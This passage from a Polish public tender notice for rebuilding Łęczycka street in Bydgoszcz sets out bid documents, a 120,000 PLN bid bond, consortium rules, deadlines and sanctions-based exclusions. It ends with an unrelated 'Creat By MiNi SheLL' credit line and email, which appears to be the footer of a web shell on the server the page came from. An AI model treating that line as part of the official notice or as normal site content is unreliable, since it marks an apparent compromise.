informacją o podstawie do dysponowania tymi osobami (sporządzonego wg wzoru Zamawiającego). Wzór wykazu stanowi załącznik Nr 10 do SWZ;<br/>3) oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa <br/>w art. 125 ust. 1 Pzp w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 oraz art. 109 ust.1 pkt 4 Pzp oraz art. 7 ust. 1 ustawy <br/>z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Uwaga: Oświadczenie/a składają odpowiednio: wykonawca / każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia / podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału <br/>w postępowaniu (sporządzone wg wzorów Zamawiającego), Wzory oświadczeń stanowią załączniki Nr 11 i 12 do SWZ.<br/>Podmiotowe środki dowodowe należy złożyć w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, w formie pisemnej lub w formie dokumentowej, w zakresie <br/>i w sposób określony w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. <br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu <br/>o udzielenie zamówienia publicznego lub konkursie.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość <br/>i aktualność. <br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 Pzp, dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które usługi, wykonają poszczególni wykonawcy (jeżeli dotyczy). Zał. nr 7 do SWZ<br/>Oświadczenie musi być złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym, lub pod. osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie zformą reprezentacji określoną w pełnomocnictwie, o którym mowa w pkt XII.8.2) i XII.9.2) SWZ lub dok. rejestrowym<br/>właściwym dla formy organizacyjnej lub innym dokumencie.<br/>2) Zobowiązanie podmiotu (jeżeli dotyczy) udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, określające w szczególności:<br/>a) nazwę i wskazanie siedziby podmiotu udostępniającego wykonawcy swoje zasoby, b) nazwę i wskazanie siedziby wykonawcy, któremu podmiot trzeci udostępnił swoje zasoby, c) określenie zamówienia publicznego, tj.: „Przebudowa ulicy Łęczyckiej w Bydgoszczy Nr sprawy NZ.2531.7.2024, d)zakres dostępnych wykonawcy<br/>zasobów innego podmiotu, (tj. informacje, jakie konkretnie zasoby zostaną udostępnione), e) sposób wykorzystania przez wykonawcę zasobów innego podmiotu przy wykonywaniu zamówienia<br/>publicznego, (tj. informacje, w jaki sposób udostępnione zasoby będą wykorzystywane przy wykonywaniu zamówienia publicznego), f)charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, (tj. informacje, na jakiej podstawie wykonawca będzie nimi dysponował),<br/>g) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,<br/>h) czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia (nie dotyczy sytuacji finansowej lub ekonomicznej), zrealizuje usługi, do realizacji których te zdolności są wymagane.<br/>3. Pełnomocnictwa<br/>1) pełnomocnictwo/a, jeżeli z właściwego rejestru albo z centralnej ewidencji i informacji o działalności gospodarczej, do których jest bezpłatny i ogólnodostępny dostęp lub z treści złożonych Zamawiającemu oświadczeń lub dokumentów nie wynika uprawnienie do podpisania oferty oraz względnie do podpisania innych oświadczeń lub dokumentów składanych wraz z ofertą,<br/>2) pełnomocnictwo/a wynikające z art. 58 ust. 2 uPzp, do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo –<br/>o ile dotyczy, Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.<br/>3) pełnomocnictwo/a, jeżeli z właściwego rejestru (do których jest bezpłatny i ogólnodostępny dostęp) lub z treści złożonych Zamawiającemu oświadczeń lub dokumentów nie wynika uprawnienie do podpisania zobowiązania innego podmiotu oraz względnie do podpisania innych oświadczeń lub dokumentów składanych przez ten podmiot (w przypadku gdy wykonawca<br/>korzysta ze zdolności innych podmiotów dla wykazania spełniania warunków udziału w postępowaniu). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia przez wykonawcę wadium w wysokości:<br/>120.000,00 (słownie: sto dwadzieścia tysięcy 00/100) PLN,<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp, zostanie odrzucona.<br/>4.	Zgodnie z art. 97 ust. 7 pkt 1-4 uPzp wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu,2)gwarancjach bankowych,3)gwarancjach ubezpieczeniowych<br/>5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 6.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego – Zarządu Dróg Miejskich i Komunikacji Publicznej w Bydgoszczy:Bank Polska Kasa Opieki S.A. (Bank Pekao S.A.) - Nr konta 25 1240 6452 1111 0010 4816 9416z dopiskiem: „Przebudowa ulicy Łęczyckiej w Bydgoszczy” nr sprawy NZ.2531.7.2024.,7,.Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać co najmniej poniższe wymagania:1)musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę określone w Pzp, bez potwierdzania tych okoliczności;2)	zawiera gwarantowaną kwotę w PLN;3)z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;4)powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;5)termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); zaleca się aby zawierały w swojej treści termin złożenia żądania zapłaty dłuższy niż termin, na jaki jest gwarancja, tj. co najmniej o jeden dzień roboczy;6)w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; 7)wskazanie nazwy dającego zlecenie (wykonawcy), beneficjenta gwarancji/ poręczenia (Zamawiającego), gwaranta/ poręczyciela (banku lub instytucji ubezpieczeniowej udzielającej gwarancji/ poręczenia) oraz wskazanie ich siedzib;8)w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (art.58 Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);9)miało taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. Dlatego w treści poręczenia lub gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnoście poręczenia lub gwarancji będą rozstrzygane zgodnie z polskim prawem i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa10.Z treści gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp musi wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie Zamawiającego, zobowiązanie gwaranta lub poręczyciela do zapłaty na rzecz Zamawiającego kwoty określonej w gwarancji lub poręczeniu, w okolicznościach, o których mowa w art. 98 ust. 6 Pzp.11.Zgodnie z art. 98 ust. 6 Pzp Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp,<br/>ciąg dalszy w sekcji IX - Pozostałe Informacje <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku, gdy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 58<br/>uPzp, (np. konsorcjum, spółka cywilna), to:<br/>1) wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego,<br/>2) wszyscy wykonawcy występujący wspólnie muszą upoważnić na piśmie pod rygorem nieważności (art.99 § 2 K.c.)<br/>ustanowionego pełnomocnika, jako przedstawiciela pozostałych, a jego upoważnienie musi być udokumentowane<br/>pełnomocnictwem przez upełnomocnionych przedstawicieli wszystkich pozostałych wykonawców i dołączone do składanej<br/>oferty,<br/>3) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,<br/>4) z treści formularza ofertowego powinno wynikać, że oferta składana jest w imieniu Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia,<br/>5) w miejscach dotyczących danych poszczególnych wykonawców (nazwa, adres, NIP, REGON, kategorię<br/>przedsiębiorstwa, do której należy) należy wpisać stosowne dane dotyczące poszczególnych Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>6) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna),<br/>wszelka korespondencja prowadzona będzie wyłącznie<br/>z pełnomocnikiem wymienionym w pełnomocnictwie, występującym jako reprezentant pozostałych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy w granicach wyznaczonych przepisami ustawy Pzp, w tym art. 455 uPzp<br/>oraz w zakresie i na warunkach określonych w projektowanych postanowieniach umowy, stanowiących załącznik nr 1 do<br/>SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.platformazakupowa.pl/transakcja/882913</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-29 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy dotyczący wadium:<br/>UWAGA: <br/>12.Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności o których mowa w art. 98 ust. 1 Pzp lub złożenia wniosku,o którym mowa w art. 98 ust. 2 Pzp:1)wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę;2)wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium 13.Złożenie wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 Pzp, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX Pzp.<br/><br/>W związku z wejściem w życie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego Zamawiający wykluczy Wykonawcę z postępowania o udzielenie zamówienia publicznego, który podlega wykluczeniu w okolicznościach<br/>określonych w art. 7 ust. 1 tej ustawy, tj.:a) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;b) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy; c) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości, jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art.1 pkt 3 ustawy.2. Wykluczenie następuje na okres trwania ww. okoliczności.3. W przypadku wykonawcy wykluczonego na podstawie art. 7 ust. 1 ww. ustawy, Zamawiający odrzuca ofertę takiego wykonawcy.4. Osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 ww. ustawy, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego, podlegają karze pieniężnej, o której mowa w art. 7 ust. 7 ww. ustawy.5. Przez ubieganie się o udzielenie zamówienia publicznego rozumie się złożenie oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com